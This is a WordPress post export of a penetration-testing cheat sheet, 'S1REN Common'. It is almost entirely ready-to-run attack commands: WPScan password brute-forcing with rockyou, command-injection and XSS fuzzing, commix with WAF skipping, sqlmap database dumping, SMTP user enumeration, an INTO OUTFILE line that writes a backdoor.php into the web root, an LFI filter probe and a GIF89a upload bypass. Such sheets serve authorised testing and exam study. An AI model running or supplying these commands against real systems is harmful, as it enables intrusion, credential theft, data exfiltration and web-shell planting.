{"id":528,"date":"2022-11-13T21:00:35","date_gmt":"2022-11-13T21:00:35","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=528"},"modified":"2023-09-20T08:27:09","modified_gmt":"2023-09-20T08:27:09","slug":"common","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/common\/","title":{"rendered":"S1REN Common"},"content":{"rendered":"\n

<\/p>\n\n\n\n

<\/span>\"\"
\n


S1REN's COMMON


<\/p>\n<\/div><\/div>\n\n\n\n

\n================================================================================\n===Nmap====\nnmap -p- -sT -sV -A $IP\nnmap -p- -sC -sV $IP --open\nnmap -p- --script=vuln $IP\n###HTTP-Methods\nnmap --script http-methods --script-args http-methods.url-path='\/website' \n###  --script smb-enum-shares\nsed IPs:\ngrep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE\n\n================================================================================\n===WPScan & SSL\nwpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u\n\n===WPScan Brute Forceing:\nwpscan --url $URL --disable-tls-checks -U users -P \/usr\/share\/wordlists\/rockyou.txt\n\n===Aggressive Plugin Detection:\nwpscan --url $URL --enumerate p --plugins-detection aggressive\n================================================================================\n===Nikto with SSL and Evasion\nnikto --host $IP -ssl -evasion 1\nSEE EVASION MODALITIES.\n================================================================================\n===dns_recon\ndnsrecon \u2013d yourdomain.com\n================================================================================\n===gobuster directory\ngobuster dir -u $URL -w \/opt\/SecLists\/Discovery\/Web-Content\/raft-medium-directories.txt -k -t 30\n\n===gobuster files\ngobuster dir -u $URL -w \/opt\/SecLists\/Discovery\/Web-Content\/raft-medium-files.txt -k -t 30\n\n===gobuster for SubDomain brute forcing:\ngobuster dns -d domain.org -w \/opt\/SecLists\/Discovery\/DNS\/subdomains-top1million-110000.txt -t 30\n\"just make sure any DNS name you find resolves to an in-scope address before you test it\"\n================================================================================\n===Extract IPs from a text file.\ngrep -o '[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}' nmapfile.txt\n================================================================================\n===Wfuzz XSS Fuzzing============================================================\nwfuzz -c -z file,\/opt\/SecLists\/Fuzzing\/XSS\/XSS-BruteLogic.txt \"$URL\"\nwfuzz -c -z file,\/opt\/SecLists\/Fuzzing\/XSS\/XSS-Jhaddix.txt \"$URL\"\n\n===COMMAND INJECTION WITH POST DATA\nwfuzz -c -z file,\/opt\/SecLists\/Fuzzing\/command-injection-commix.txt -d \"doi=FUZZ\" \"$URL\"\n\n===Test for Paramter Existence!\nwfuzz -c -z file,\/opt\/SecLists\/Discovery\/Web-Content\/burp-parameter-names.txt \"$URL\"\n\n===AUTHENTICATED FUZZING DIRECTORIES:\nwfuzz -c -z file,\/opt\/SecLists\/Discovery\/Web-Content\/raft-medium-directories.txt --hc 404 -d \"SESSIONID=value\" \"$URL\"\n\n===AUTHENTICATED FILE FUZZING:\nwfuzz -c -z file,\/opt\/SecLists\/Discovery\/Web-Content\/raft-medium-files.txt --hc 404 -d \"SESSIONID=value\" \"$URL\"\n\n===FUZZ Directories:\nwfuzz -c -z file,\/opt\/SecLists\/Discovery\/Web-Content\/raft-large-directories.txt --hc 404 \"$URL\"\n\n===FUZZ FILES:\nwfuzz -c -z file,\/opt\/SecLists\/Discovery\/Web-Content\/raft-large-files.txt --hc 404 \"$URL\"\n|\nLARGE WORDS:\nwfuzz -c -z file,\/opt\/SecLists\/Discovery\/Web-Content\/raft-large-words.txt --hc 404 \"$URL\"\n|\nUSERS:\nwfuzz -c -z file,\/opt\/SecLists\/Usernames\/top-usernames-shortlist.txt --hc 404,403 \"$URL\"\n\n\n================================================================================\n===Command Injection with commix, ssl, waf, random agent.\ncommix --url=\"https:\/\/supermegaleetultradomain.com?parameter=\" --level=3 --force-ssl --skip-waf --random-agent\n================================================================================\n===SQLMap\nsqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl\nsqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3 --dump\n\/SecLists\/Fuzzing\/alphanum-case.txt\n================================================================================\n===Social Recon\ntheharvester -d domain.org -l 500 -b google\n================================================================================\n===Nmap HTTP-methods\nnmap -p80,443 --script=http-methods  --script-args http-methods.url-path='\/directory\/goes\/here'\n================================================================================\n===SMTP USER ENUM\nsmtp-user-enum -M VRFY -U \/opt\/SecLists\/Usernames\/xato-net-10-million-usernames.txt -t $IP\nsmtp-user-enum -M EXPN -U \/opt\/SecLists\/Usernames\/xato-net-10-million-usernames.txt -t $IP\nsmtp-user-enum -M RCPT -U \/opt\/SecLists\/Usernames\/xato-net-10-million-usernames.txt -t $IP\nsmtp-user-enum -M EXPN -U \/opt\/SecLists\/Usernames\/xato-net-10-million-usernames.txt -t $IP\n================================================================================\n\n===Command Execution Verification - [Ping check]\ntcpdump -i any -c5 icmp\n====\n#Check Network\nnetdiscover \/r 0.0.0.0\/24\n====\n#INTO OUTFILE D00R\nSELECT \u201c\u201d into outfile \u201c\/var\/www\/WEROOT\/backdoor.php\u201d;\n====\nLFI?\n#PHP Filter Checks.\nphp:\/\/filter\/convert.base64-encode\/resource=\n====\nUPLOAD IMAGE?\nGIF89a1\n\n<\/pre>\n\n\n\n
\"\"<\/p>\n\n\n\n
S1REN'S COMMON IMPLIES THAT YOU HAVE SECLISTS IN \/opt\/SecLists\/<\/span><\/strong>
https:\/\/github.com\/danielmiessler\/SecLists<\/p>\n","protected":false},"excerpt":{"rendered":"
================================================================================ ===Nmap==== nmap -p- -sT -sV -A $IP nmap -p- -sC -sV $IP --open nmap -p- --script=vuln $IP ###HTTP-Methods nmap --script http-methods --script-args http-methods.url-path='\/website' ### --script smb-enum-shares sed IPs: grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE ================================================================================ ===WPScan & SSL wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u ===WPScan Brute Forceing: wpscan --url $URL --disable-tls-checks -U […]<\/p>\n","protected":false},"author":1,"featured_media":529,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[84,83,82,4,34,85],"class_list":["post-528","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-common","tag-cyber","tag-offensive-security","tag-s1ren","tag-siren","tag-sirens-common"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/528","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=528"}],"version-history":[{"count":11,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/528\/revisions"}],"predecessor-version":[{"id":589,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/528\/revisions\/589"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/529"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=528"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}